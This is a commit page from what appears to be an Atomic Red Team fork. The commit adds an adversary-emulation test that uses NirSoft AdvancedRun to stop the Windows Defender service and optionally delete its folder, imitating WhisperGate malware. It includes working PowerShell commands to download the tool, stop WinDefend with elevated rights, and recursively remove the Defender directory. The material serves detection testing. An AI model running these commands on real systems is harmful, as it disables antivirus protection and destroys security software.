security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Adding T1562.001 Test 28 (Issue 1839) (#1845)

Browse Source 
* Adding T1562.001 Test 28 (Issue 1839)

* Updating T1562.001 YAML to include additional input arg and cleanup

* make folder delete optional

* Update T1562.001.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Leo Verlod
2022-04-05 10:59:08 -05:00
committed by GitHub
parent 5006f24bfb
commit cbeebddaa4
1 changed files with 37 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1562.001/T1562.001.yaml
+37 -1
View File
@@ -585,4 +585,40 @@ atomic_tests:
New-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 0
cleanup_command: Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 1
name: powershell
- name: Disable Defender Using NirSoft AdvancedRun
description: |
Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html
This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3
Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk.
supported_platforms:
- windows
input_arguments:
AdvancedRun_Location:
description: Path of Advanced Run executable
type: Path
default: '$env:temp\AdvancedRun.exe'
delete_defender_folder:
description: Set to 1 to also delete the Windows Defender folder
type: Integer
default: 0
dependency_executor_name: powershell
dependencies:
- description: |
Advancedrun.exe must exist at #{AdvancedRun_Location}
prereq_command: |
if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip"
Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force
executor:
command: |
Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
if(#{delete_defender_folder}){
$CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
}
cleanup_command: |
Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
name: powershell
elevation_required: true